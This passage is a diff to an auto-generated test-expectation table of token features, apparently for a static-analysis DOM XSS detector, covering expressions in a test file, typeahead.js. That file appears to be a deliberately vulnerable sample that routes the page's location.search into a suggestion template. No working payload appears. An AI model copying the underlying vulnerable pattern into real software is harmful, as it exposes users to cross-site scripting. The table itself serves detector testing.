val | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:17 | $('.typeahead') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:17 | $('.typeahead') | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:17 | exceptional return of $('.typeahead') | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:17 | exceptional return of $('.typeahead') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:17 | exceptional return of $('.typeahead') | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:17 | exceptional return of $('.typeahead') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:17 | exceptional return of $('.typeahead') | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:27 | $('.typ ... peahead | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:27 | $('.typ ... peahead | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:27 | $('.typ ... peahead | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:27 | $('.typ ... peahead | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:27 | $('.typ ... peahead | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:13:4 | $('.typ ... }\\n }) | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:13:4 | $('.typ ... }\\n }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:13:4 | $('.typ ... }\\n }) | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:13:4 | $('.typ ... }\\n }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:13:4 | $('.typ ... }\\n }) | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:13:4 | exceptional return of $('.typ ... }\\n }) | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:13:4 | exceptional return of $('.typ ... }\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:13:4 | exceptional return of $('.typ ... }\\n }) | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:13:4 | exceptional return of $('.typ ... }\\n }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:13:4 | exceptional return of $('.typ ... }\\n }) | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:6:5:6:16 | '.typeahead' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/typeahead.js:6:5:6:16 | '.typeahead' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/typeahead.js:6:5:6:16 | '.typeahead' | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | @@ -18098,6 +124627,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:6:5:6:16 | '.typeahead' | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:6:5:6:16 | '.typeahead' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:6:5:6:16 | '.typeahead' | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:19:6:27 | typeahead | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:19:6:27 | typeahead | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:19:6:27 | typeahead | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:19:6:27 | typeahead | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:19:6:27 | typeahead | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:6:29:6:30 | {} | CalleeFlexibleAccessPath | $().typeahead | | autogenerated/Xss/DomBasedXss/typeahead.js:6:29:6:30 | {} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/typeahead.js:6:29:6:30 | {} | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | @@ -18112,6 +124646,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:6:33:13:3 | {\\n s ... }\\n } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:6:33:13:3 | {\\n s ... }\\n } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:6:33:13:3 | {\\n s ... }\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:10 | source | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:10 | source | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:10 | source | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:10 | source | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:10 | source | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:37 | source: ... apter() | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:37 | source: ... apter() | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:37 | source: ... apter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:37 | source: ... apter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:37 | source: ... apter() | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:37 | source: ... apter() | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:37 | source: ... apter() | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:37 | source: ... apter() | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:37 | source: ... apter() | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:5:7:37 | source: ... apter() | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:25 | autocompleter | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:25 | autocompleter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:25 | autocompleter | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:25 | autocompleter | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:25 | autocompleter | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:35 | autocom ... Adapter | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:35 | autocom ... Adapter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:35 | autocom ... Adapter | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:35 | autocom ... Adapter | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:35 | autocom ... Adapter | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:37 | autocom ... apter() | CalleeFlexibleAccessPath | $().typeahead | | autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:37 | autocom ... apter() | InputAccessPathFromCallee | 1.source | | autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:37 | autocom ... apter() | InputArgumentIndex | 1 | @@ -18121,6 +124680,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:37 | autocom ... apter() | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:37 | autocom ... apter() | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:37 | autocom ... apter() | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:37 | exceptional return of autocom ... apter() | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:37 | exceptional return of autocom ... apter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:37 | exceptional return of autocom ... apter() | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:37 | exceptional return of autocom ... apter() | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:13:7:37 | exceptional return of autocom ... apter() | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:27:7:35 | ttAdapter | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:27:7:35 | ttAdapter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:27:7:35 | ttAdapter | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:27:7:35 | ttAdapter | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:7:27:7:35 | ttAdapter | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:8:13 | templates | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:8:13 | templates | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:8:13 | templates | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:8:13 | templates | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:8:13 | templates | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:12:5 | templat ... }\\n } | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:12:5 | templat ... }\\n } | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:12:5 | templat ... }\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:12:5 | templat ... }\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:12:5 | templat ... }\\n } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:12:5 | templat ... }\\n } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:12:5 | templat ... }\\n } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:12:5 | templat ... }\\n } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:12:5 | templat ... }\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:8:5:12:5 | templat ... }\\n } | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:8:16:12:5 | {\\n ... }\\n } | CalleeFlexibleAccessPath | $().typeahead | | autogenerated/Xss/DomBasedXss/typeahead.js:8:16:12:5 | {\\n ... }\\n } | InputAccessPathFromCallee | 1.templates | | autogenerated/Xss/DomBasedXss/typeahead.js:8:16:12:5 | {\\n ... }\\n } | InputArgumentIndex | 1 | @@ -18130,6 +124714,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:8:16:12:5 | {\\n ... }\\n } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:8:16:12:5 | {\\n ... }\\n } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:8:16:12:5 | {\\n ... }\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:9:16 | suggestion | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:9:16 | suggestion | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:9:16 | suggestion | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:9:16 | suggestion | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:9:16 | suggestion | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:11:7 | suggest ... } | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:11:7 | suggest ... } | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:11:7 | suggest ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:11:7 | suggest ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:11:7 | suggest ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:11:7 | suggest ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:11:7 | suggest ... } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:11:7 | suggest ... } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:11:7 | suggest ... } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:7:11:7 | suggest ... } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:9:18 | this | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:9:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:9:18 | this | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:9:18 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:9:18 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | 'arguments' object of method suggestion | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | 'arguments' object of method suggestion | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | 'arguments' object of method suggestion | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | 'arguments' object of method suggestion | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | 'arguments' object of method suggestion | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | exceptional return of method suggestion | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | exceptional return of method suggestion | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | exceptional return of method suggestion | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | exceptional return of method suggestion | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | exceptional return of method suggestion | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | functio ... } | CalleeFlexibleAccessPath | $().typeahead | | autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | functio ... } | InputAccessPathFromCallee | 1.templates.suggestion | | autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | functio ... } | InputArgumentIndex | 1 | @@ -18139,6 +124753,56 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | functio ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | functio ... } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | functio ... } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | return of method suggestion | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | return of method suggestion | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | return of method suggestion | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | return of method suggestion | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:19:11:7 | return of method suggestion | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:28:9:30 | loc | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:28:9:30 | loc | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:28:9:30 | loc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:28:9:30 | loc | contextSurroundingFunctionParameters | ()\n(loc) | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:28:9:30 | loc | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:28:9:30 | loc | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:28:9:30 | loc | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:28:9:30 | loc | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:28:9:30 | loc | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:9:28:9:30 | loc | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:10:16:10:18 | loc | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:10:16:10:18 | loc | contextSurroundingFunctionParameters | ()\n(loc) | +| autogenerated/Xss/DomBasedXss/typeahead.js:10:16:10:18 | loc | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:10:16:10:18 | loc | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:10:16:10:18 | loc | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:3 | $ | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:3 | $ | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:17 | $('.typeahead') | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:17 | $('.typeahead') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:17 | $('.typeahead') | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:17 | $('.typeahead') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:17 | $('.typeahead') | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:17 | exceptional return of $('.typeahead') | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:17 | exceptional return of $('.typeahead') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:17 | exceptional return of $('.typeahead') | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:17 | exceptional return of $('.typeahead') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:17 | exceptional return of $('.typeahead') | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:27 | $('.typ ... peahead | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:27 | $('.typ ... peahead | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:27 | $('.typ ... peahead | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:27 | $('.typ ... peahead | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:16:27 | $('.typ ... peahead | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:29:3 | $('.typ ... }\\n ) | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:29:3 | $('.typ ... }\\n ) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:29:3 | $('.typ ... }\\n ) | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:29:3 | $('.typ ... }\\n ) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:29:3 | $('.typ ... }\\n ) | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:29:3 | exceptional return of $('.typ ... }\\n ) | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:29:3 | exceptional return of $('.typ ... }\\n ) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:29:3 | exceptional return of $('.typ ... }\\n ) | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter 